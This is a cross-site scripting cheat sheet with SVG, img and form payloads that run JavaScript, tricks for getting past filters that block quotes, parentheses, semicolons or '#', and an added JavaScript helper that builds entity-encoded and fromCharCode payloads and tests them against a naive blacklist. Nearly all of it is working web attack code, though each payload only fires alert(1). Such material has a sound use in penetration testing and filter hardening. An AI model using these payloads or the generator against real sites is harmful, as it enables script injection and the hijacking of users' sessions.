<img src="1" onerror=location="javascript:alert%281%29">
SVG:
<svg xmlns="http://www.w3.org/2000/svg">
<g onload="javascript:alert(1)"></g>
</svg>
<svg xmlns="http://www.w3.org/2000/svg">
<animation xlink:href="javascript:alert(1)"/>
</svg>
<svg xmlns="http://www.w3.org/2000/svg">
<foreignObject xlink:href="javascript:alert(1)"/>
</svg>
<svg xmlns="http://www.w3.org/2000/svg">
<set attributeName="onmouseover" to="alert(1)"/>
</svg>
<svg xmlns="http://www.w3.org/2000/svg">
<handler xmlns:ev="http://www.w3.org/2001/xmlevents" ev:event="load">alert(1)</handler>
</svg>
Note: several of these depend on SVG Tiny 1.2 features (animation, handler, xlink:href on foreignObject) that only legacy Opera ever supported, and the set/attributeName trick was Firefox-specific; verify each one against the target browser instead of assuming it fires.
Collected URLs:
/*
https://github.com/cure53/H5SC
http://www.codeceo.com/article/12-funny-xss-vector.html
http://www.freebuf.com/articles/web/20282.html
https://jiji262.github.io/wooyun_articles/drops/Bypass xss过滤的测试方法.html
Entity encoding: https://dev.w3.org/html5/html-author/charref
*/
Without on* event handlers:
<form><button formaction=javascript:alert(1)>CLICKME
When = ' " are filtered (XSSCode below stands for the comma-separated character codes of the HTML to inject):
<script>document.write(String.fromCharCode(XSSCode));</script>
When = ( ) ; : are all filtered at the same time:
<svg><script>alert(/1/)</script>
Inside <svg>, script is foreign content, so the HTML parser decodes character references in its text before the script runs; the parentheses can therefore be written as numeric references (such as &#40 for "("), and since HTML decodes a numeric reference in text content even without the trailing ";", the ";" never has to appear either. The /1/ argument avoids quotes.
|------------------------------------------|
|--- Now I finally know what it feels like to use svg and script together ---|
|--- Encode it any way you like, awesome ---|
|--- But only HTML encoding works here ---|
|------------------------------------------|
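Added example (my own code, not from the notes above or from the linked sources): a small JavaScript helper that builds the two encoded forms from the "= ' \"" and "= ( ) ; :" cases and checks them against a naive character blacklist. The function names, blacklists and sample payloads are assumptions made for this example; the parsing facts it relies on are HTML5's: script inside svg is foreign content whose text has character references decoded, and a numeric reference in text content decodes even when its trailing ";" is missing.

```javascript
// Added example, not part of the original notes. Helper functions are assumed
// names chosen for this demo; sample inputs are constructed.

// Case 1 ("= ' \" filtered"): String.fromCharCode takes bare numbers, so the
// injected HTML needs no quote or equals sign in the script source at all.
function toFromCharCode(text) {
  const codes = [];
  for (let i = 0; i < text.length; i++) codes.push(text.charCodeAt(i));
  return `String.fromCharCode(${codes.join(',')})`;
}

function buildDocumentWritePayload(html) {
  return `<script>document.write(${toFromCharCode(html)})</script>`;
}

// Case 2 ("= ( ) ; : all filtered"): inside <svg>, <script> is foreign content,
// so the HTML parser decodes character references in its text before the
// script runs (a plain HTML <script> is raw text and would run the literal
// "&#40"). In text content a numeric reference also decodes without its ';',
// which is what keeps ';' out of the payload.
function entityEncode(js, banned, { semicolon = true, hex = false } = {}) {
  let out = '';
  for (let i = 0; i < js.length; i++) {
    const ch = js[i];
    if (!banned.includes(ch)) { out += ch; continue; }
    const code = js.charCodeAt(i);
    const next = i + 1 < js.length ? js[i + 1] : '';
    // Without ';' the reference ends at the first non-digit, so a following
    // digit would be swallowed into the number ("&#40" + "1" reads as U+0191).
    // Refuse rather than emit a payload that silently breaks.
    const ambiguous = hex ? /[0-9a-fA-F]/.test(next) : /[0-9]/.test(next);
    if (!semicolon && ambiguous) {
      throw new Error(`cannot encode ${JSON.stringify(ch)} before ${JSON.stringify(next)} without ';'`);
    }
    out += hex ? `&#x${code.toString(16)}` : `&#${code}`;
    if (semicolon) out += ';';
  }
  return out;
}

// Mirror of the browser's handling of numeric character references (decimal
// and hex, with or without ';'), used to show the encoded text round-trips.
function decodeNumericEntities(html) {
  return html.replace(/&#([xX][0-9a-fA-F]+|[0-9]+);?/g, (_, body) =>
    String.fromCharCode(/^[xX]/.test(body) ? parseInt(body.slice(1), 16) : parseInt(body, 10)));
}

function buildSvgScriptPayload(js, banned) {
  // Drop the ';' terminators whenever ';' itself is on the blacklist.
  const encoded = entityEncode(js, banned, { semicolon: !banned.includes(';') });
  return `<svg><script>${encoded}</script></svg>`;
}

// Naive blacklist filter of the kind these notes are bypassing: true = passes.
function passesBlacklist(input, banned) {
  for (const ch of banned) if (input.includes(ch)) return false;
  return true;
}

// Demo run (only executed when the file is run directly).
if (typeof require !== 'undefined' && require.main === module) {
  const quoteFilter = '=\'"';
  const p1 = buildDocumentWritePayload('<img src=x onerror=alert(1)>');
  console.log(p1, passesBlacklist(p1, quoteFilter));
  const parenFilter = '=();:';
  const p2 = buildSvgScriptPayload('alert(/1/)', parenFilter);
  console.log(p2, passesBlacklist(p2, parenFilter));
  console.log(decodeNumericEntities('alert&#40/1/&#41'));
}
```

Run it with node. The ";"-less form is what keeps the <svg><script> payload clear of the ";" in the blacklist, and the encoder deliberately refuses the one case where dropping the terminator changes the meaning (a digit right after the reference), which is also why the note's own payload uses /1/ rather than 1.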
Multi-line bypass:
<svg /*I am hidden*/onload=alert(1)
Encoding can be applied on top of this for a further bypass:
<svg onload=
alert(1)
The first one also gets past a regex that checks for #.
USING document.write()
document.write(prompt(1)); // haven't run into this much before, and haven't tested it